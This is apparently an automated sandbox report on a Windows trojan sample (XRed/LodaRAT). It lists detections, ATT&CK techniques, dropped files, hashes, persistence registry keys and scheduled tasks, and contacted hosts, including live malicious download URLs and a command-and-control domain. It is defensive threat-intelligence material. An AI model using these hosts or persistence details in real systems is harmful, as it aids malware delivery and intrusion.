                              Source: XNLAGO.exe, 0000000D.00000002.1464129188.000000000403A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_81C
                              Source: XNLAGO.exe, 00000018.00000002.2341128073.00000000007DE000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                              Source: XNLAGO.exe, 00000015.00000002.1802294450.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_81
                              Source: XNLAGO.exe Binary or memory string: WIN_XP
                              Source: XNLAGO.exe, 00000014.00000002.1721312640.0000000004991000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_81=
                              Source: XNLAGO.exe, 00000018.00000002.2351605635.00000000046A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_81g
                              Source: XNLAGO.exe Binary or memory string: WIN_XPe
                              Source: XNLAGO.exe Binary or memory string: WIN_VISTA
                              Source: XNLAGO.exe, 0000000A.00000003.1411593075.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_81L
                              Source: XNLAGO.exe Binary or memory string: WIN_7
                              Source: XNLAGO.exe Binary or memory string: WIN_8
                              Source: Yara match File source: Process Memory Space: ._cache_JPS.exe PID: 7544, type: MEMORYSTR

                              Remote Access Functionality

                              Source: Yara match File source: Process Memory Space: ._cache_JPS.exe PID: 7544, type: MEMORYSTR
                              Source: Yara match File source: JPS.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.JPS.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: 00000003.00000003.1387520897.0000000000535000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: JPS.exe PID: 7448, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 7604, type: MEMORYSTR
                              Source: Yara match File source: C:\ProgramData\Synaptics\RCX5246.tmp, type: DROPPED
                              Source: Yara match File source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AE91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 2_2_00AE91DC
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AE96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_00AE96E2
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_007891DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 10_2_007891DC
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_007896E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 10_2_007896E2
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity Information | 421 Scripting | 2 Valid Accounts | 31 Windows Management Instrumentation | 421 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                              Credentials | Domains | 1 Replication Through Removable Media | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Peripheral Device Discovery | Remote Desktop Protocol | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                              Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Valid Accounts | 1 Extra Window Memory Injection | 21 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                              Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 2 Valid Accounts | 11 Software Packing | NTDS | 4 File and Directory Discovery | Distributed Component Object Model | Input Capture | 34 Application Layer Protocol | Traffic Duplication | Data Destruction
                              Gather Victim Network Information | Server | Cloud Accounts | Launchd | 21 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 58 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 12 Process Injection | 1 Extra Window Memory Injection | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Scheduled Task/Job | 12 Masquerading | DCSync | 161 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | 21 Registry Run Keys / Startup Folder | 2 Valid Accounts | Proc Filesystem | 31 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 31 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 3 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                              IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 21 Access Token Manipulation | Network Sniffing | 11 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                              Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 12 Process Injection | Input Capture | 1 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                              Behavior graph (image not included): ID: 1582339, Sample: JPS.exe, Startdate: 30/12/2024, Architecture: WINDOWS, Score: 100

                              Source | Detection | Scanner | Label | Link
                              JPS.exe | 86% | Virustotal | | Browse
                              JPS.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
                              JPS.exe | 100% | Avira | TR/Dldr.Agent.SH |
                              JPS.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                              JPS.exe | 100% | Joe Sandbox ML | |

                              Source | Detection | Scanner | Label | Link
                              C:\ProgramData\Synaptics\RCX5246.tmp | 100% | Avira | TR/Dldr.Agent.SH |
                              C:\ProgramData\Synaptics\RCX5246.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                              C:\Users\user\AppData\Local\Temp\BQQQVU.vbs | 100% | Avira | VBS/Runner.VPJI |
                              C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH |
                              C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                              C:\Users\user\Documents\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH |
                              C:\Users\user\Documents\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                              C:\ProgramData\Synaptics\RCX5246.tmp | 100% | Joe Sandbox ML | |
                              C:\Users\user\Desktop\._cache_JPS.exe | 100% | Joe Sandbox ML | |
                              C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe | 100% | Joe Sandbox ML | |
                              C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | |
                              C:\Users\user\Documents\~$cache1 | 100% | Joe Sandbox ML | |
                              C:\ProgramData\Synaptics\RCX5246.tmp | 92% | ReversingLabs | Win32.Worm.Zorex |
                              C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
                              C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe | 68% | ReversingLabs | Win32.Trojan.Generic |
                              C:\Users\user\Desktop\._cache_JPS.exe | 68% | ReversingLabs | Win32.Trojan.Generic |
                              C:\Users\user\Documents\~$cache1 | 92% | ReversingLabs | Win32.Worm.Zorex |

                              No Antivirus matches
                              No Antivirus matches

                              Source | Detection | Scanner | Label | Link
                              http://xred.site50.net/syn/SSLLibrary.dlp | 100% | Avira URL Cloud | malware |
                              http://xred.site50.net/syn/SUpdate.iniH) | 100% | Avira URL Cloud | malware |
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              69.42.215.252
                              truefalse
                                high
                                docs.google.com
                                172.217.18.110
                                truefalse
                                  high
                                  drive.usercontent.google.com
                                  142.250.181.225
                                  truefalse
                                    high
                                    xred.mooo.com
                                    unknown
                                    unknownfalse
                                      high
Name | Malicious | Antivirus Detection | Reputation
xred.mooo.com | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
142.250.181.225 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
172.111.138.100 | unknown | United States | | 3223 | VOXILITYGB | true
172.217.18.110 | docs.google.com | United States | | 15169 | GOOGLEUS | false
69.42.215.252 | freedns.afraid.org | United States | | 17048 | AWKNET-LLCUS | false
                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                  Analysis ID:1582339
                                                                                                                                  Start date and time:2024-12-30 11:24:21 +01:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 9m 55s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:26
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:JPS.exe
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.expl.evad.winEXE@21/53@9/4
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                  • Number of executed functions: 87
                                                                                                                                  • Number of non-executed functions: 279
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 20.42.73.28, 172.202.163.200, 40.69.42.241, 20.3.187.198, 20.42.65.92, 13.107.246.45, 184.28.90.27, 40.126.32.140, 173.222.162.42
                                                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, weu-azsc-config.officeapps.live.com, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, officeclient.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, onedscolprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                  • Execution Graph export aborted for target Synaptics.exe, PID 7604 because there are no executed function
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
05:25:27 | API Interceptor | 277x Sleep call for process: Synaptics.exe modified
05:26:09 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
11:25:23 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BQQQVU "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
11:25:24 | Task Scheduler | Run new task: BQQQVU.exe path: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
11:25:32 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
11:25:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BQQQVU "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
11:25:49 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.111.138.100 | 222.exe | malicious | LodaRAT, XRed |
172.111.138.100 | mmi8nLybam.exe | malicious | LodaRAT |
172.111.138.100 | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed |
172.111.138.100 | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed |
172.111.138.100 | New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed |
172.111.138.100 | RNEQTT.exe | malicious | LodaRAT, XRed |
172.111.138.100 | Bank Information Details.bat | malicious | LodaRAT, XRed |
172.111.138.100 | Purchase Order Supplies.Pdf.exe | malicious | LodaRAT |
172.111.138.100 | bf-p2b.exe | malicious | LodaRAT |
172.111.138.100 | gry.exe | malicious | Unknown |
69.42.215.252 | 222.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | zhuzhu.exe | malicious | GhostRat, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | blq.exe | malicious | Gh0stCringe, RunningRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Match | Associated Sample Name / URL | Detection | Threat Name | Context
freedns.afraid.org | 222.exe | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | zhuzhu.exe | malicious | GhostRat, XRed | 69.42.215.252
freedns.afraid.org | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | blq.exe | malicious | Gh0stCringe, RunningRAT, XRed | 69.42.215.252
freedns.afraid.org | New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | RNEQTT.exe | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | ZmrwoZsbPp.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | ccmsetup.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | Synaptics.exe | malicious | XRed | 69.42.215.252
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VOXILITYGB | 222.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | mmi8nLybam.exe | malicious | LodaRAT | 172.111.138.100
VOXILITYGB | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | loligang.mips.elf | malicious | Mirai | 104.250.189.221
VOXILITYGB | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | RNEQTT.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | malicious | Remcos | 104.243.246.120
VOXILITYGB | nabsh4.elf | malicious | Unknown | 46.243.206.70
VOXILITYGB | 7jBzTH9FXQ.exe | malicious | Unknown | 37.221.166.158
AWKNET-LLCUS | 222.exe | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | zhuzhu.exe | malicious | GhostRat, XRed | 69.42.215.252
AWKNET-LLCUS | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | blq.exe | malicious | Gh0stCringe, RunningRAT, XRed | 69.42.215.252
AWKNET-LLCUS | New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | RNEQTT.exe | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | ZmrwoZsbPp.exe | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | ccmsetup.exe | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | Synaptics.exe | malicious | XRed | 69.42.215.252
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | 222.exe | malicious | LodaRAT, XRed | 172.217.18.110, 142.250.181.225
37f463bf4616ecd445d4a1937da06e19 | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 172.217.18.110, 142.250.181.225
37f463bf4616ecd445d4a1937da06e19 | zhuzhu.exe | malicious | GhostRat, XRed | 172.217.18.110, 142.250.181.225
37f463bf4616ecd445d4a1937da06e19 | setup.msi | malicious | Unknown | 172.217.18.110, 142.250.181.225
37f463bf4616ecd445d4a1937da06e19 | Lets-x64.exe | malicious | Nitol, Zegost | 172.217.18.110, 142.250.181.225
37f463bf4616ecd445d4a1937da06e19 | KL-3.1.16.exe | malicious | Nitol, Zegost | 172.217.18.110, 142.250.181.225
37f463bf4616ecd445d4a1937da06e19 | Whyet-4.9.exe | malicious | Nitol, Zegost | 172.217.18.110, 142.250.181.225
37f463bf4616ecd445d4a1937da06e19 | QQyisSetups64.exe | malicious | GhostRat | 172.217.18.110, 142.250.181.225
37f463bf4616ecd445d4a1937da06e19 | wyySetups64.exe | malicious | GhostRat | 172.217.18.110, 142.250.181.225
                                                                                                                                                      No context
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):118
                                                                                                                                                      Entropy (8bit):3.5700810731231707
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                                      MD5:573220372DA4ED487441611079B623CD
                                                                                                                                                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
Preview:<?xml version="1.0" encoding="UTF-16"?> <HeartbeatCache/>
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):65536
                                                                                                                                                      Entropy (8bit):1.1340163050281056
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:9U2VpsoI40Kks/kDzJDzqjLeA/NcdsJzuiFYZ24IO8EKDzy:ZyoWKksMJqjsCzuiFYY4IO8zy
                                                                                                                                                      MD5:406DCE548A089C28208A14A79D05001B
                                                                                                                                                      SHA1:5353DDF49A9A3A13D309853980C57D3307DB2C39
                                                                                                                                                      SHA-256:C74AA013CDA8BC806339B20FEF19352594A9D398E1EB6A56A873015A18F19095
                                                                                                                                                      SHA-512:0BAB0BCAE73E0F47E7DB7ABCCBD6C19A514234B87722CBCC3D7B75C54120FB97689BB521FAB813795E564F58B5B91DF832CCB6B12D5D94D2176A88459AD43587
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6312
                                                                                                                                                      Entropy (8bit):3.723033551668718
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:R6l7wVeJjkxR6WDN5YirJkf60pD089bNusfyvPm:R6lXJ66WDN5YGJkyoNtfr
                                                                                                                                                      MD5:12719B6664DC6E284B86E5B21EB32F62
                                                                                                                                                      SHA1:67230E829F02DFEE539E23339C89394D6FA9E1F0
                                                                                                                                                      SHA-256:48202F43AE4FE6BE41874D8D728E7EBFA4DAC6A4DC8D98CF319CC75AFC1C116B
                                                                                                                                                      SHA-512:1A0EB38F5CB51F2A6E67FA73834BB796A4DD0C00138A2991DFC2A539B686116305ED7621B3A226419B4501C23B5F3D31C5F404EEB811CB935FD9E52EC8994031
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4580
                                                                                                                                                      Entropy (8bit):4.45033318588171
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cvIwWl8zs4zJg77aI925WpW8VYlYm8M4JFFFb+q8Z4KZdd:uIjfWI7gI7VJJVBKZdd
                                                                                                                                                      MD5:6460FFB5BD585B2152E0FB611D423177
                                                                                                                                                      SHA1:17AAFA726050F5D880C90F071CFB276F35A4BD8A
                                                                                                                                                      SHA-256:2EB7450E73DC7FFE44F6F1D157FEEA0DC3D8D917A015739C24AD20024DB6FAB6
                                                                                                                                                      SHA-512:819069E3CDAF1E6187EB19D6126803807CB812B7E9231BBBF53AC5CBA812DFCD082A8F1C8DDA7457C93AAC47BE4625938A292DD336061C50871A2B5178F4831E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653848" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:25:59 2024, 0x1205a4 type
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3809284
                                                                                                                                                      Entropy (8bit):1.9728553692228321
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:4UKK3PKYtcmX3Md5jh0iELOjiOCYuLpB2pVFo1rbKS4Odjz8I3B9zo:4S/h05jhQL/trYPFoJl7Rz8Mjzo
                                                                                                                                                      MD5:036966C0C5F0C07C52E34E0452E92A96
                                                                                                                                                      SHA1:FA0CC98243A17168E47C13A9FD3486F58884F565
                                                                                                                                                      SHA-256:D7A610A1DEB34D84ACEA57417B588DB234D0C496709168797574C4EB82793DAE
                                                                                                                                                      SHA-512:EC97DDB2D84CC19AF3B9AAAFB4C7E95C8953BF66637D5D8D2BFD8584B23E9A9715F188F3BBC1750DCBEE00F284DB094F830A1851EF8AACDB51305A42226E6FD9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Users\user\Desktop\JPS.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):771584
                                                                                                                                                      Entropy (8bit):6.632480030468604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Igr:ansJ39LyjbJkQFMhmC+6GD9n
                                                                                                                                                      MD5:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                      SHA1:F44DA6758D62D39C9F96E18763DCA6FC858385EF
                                                                                                                                                      SHA-256:634238998B9CA21CE7558C5410FFD9D21E42AC069FFEB1B590EED99BAC7C1F02
                                                                                                                                                      SHA-512:B8B07692BF6770D1F67F5A9CCE809F9B20EDCA21E7480151D0FA35AC1CFC61CBA5953B0475CAAA3C4892860C0CEE287E689E50FC1727CE9533FD87A85DA820B4
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX5246.tmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX5246.tmp, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Process:C:\Users\user\Desktop\JPS.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1989120
                                                                                                                                                      Entropy (8bit):6.934025794433937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:8nsJ39LyjbJkQFMhmC+6GD9bhloDX0XOf44e7JFtxAnWe2fxYBQl:8nsHyjtk2MYC5GDxhloJfXnWbfxp
                                                                                                                                                      MD5:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                      SHA1:CC9F762B21F649252881087B2FF56E88D4B5A6F1
